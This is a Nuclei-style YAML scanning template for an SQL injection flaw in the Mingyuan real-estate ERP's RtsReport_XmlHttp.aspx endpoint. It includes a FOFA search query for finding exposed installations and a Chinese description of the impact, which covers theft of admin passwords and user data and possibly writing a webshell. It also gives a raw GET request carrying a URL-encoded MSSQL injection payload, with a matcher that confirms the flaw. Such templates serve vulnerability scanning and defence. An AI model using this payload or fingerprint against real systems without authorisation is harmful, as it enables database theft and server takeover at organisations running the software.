id: mingyuandichanERP-RtsReport_XmlHttp_aspx-sql

info:
  tags: mingyuandichanERP-RtsReport_XmlHttp_aspx-sql
  name: 明源地产ERP RtsReport_XmlHttp.aspx SQL注入漏洞
  author: xc
  severity: high
  description: |-
    fofa: body="/_common/scripts/md5-min.js"
    明源地产ERP RtsReport_XmlHttp.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
http:
  - raw:
      - |
        GET /Report/RtsReport_XmlHttp.aspx/?ywtype=SaveGeneralParam&RptID=1%27%2B(SELECT%20CHAR(65)%2BCHAR(119)%2BCHAR(102)%2BCHAR(103)%20WHERE%204294%3D4294%20AND%203472%20IN%20(SELECT%20(CHAR(113)%2BCHAR(107)%2BCHAR(106)%2BCHAR(113)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(3472%3D3472)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(107)%2BCHAR(98)%2BCHAR(118)%2BCHAR(113))))%2B%27 HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'qkjqq1qkbvq'
      - type: status
        status: 
          - 302
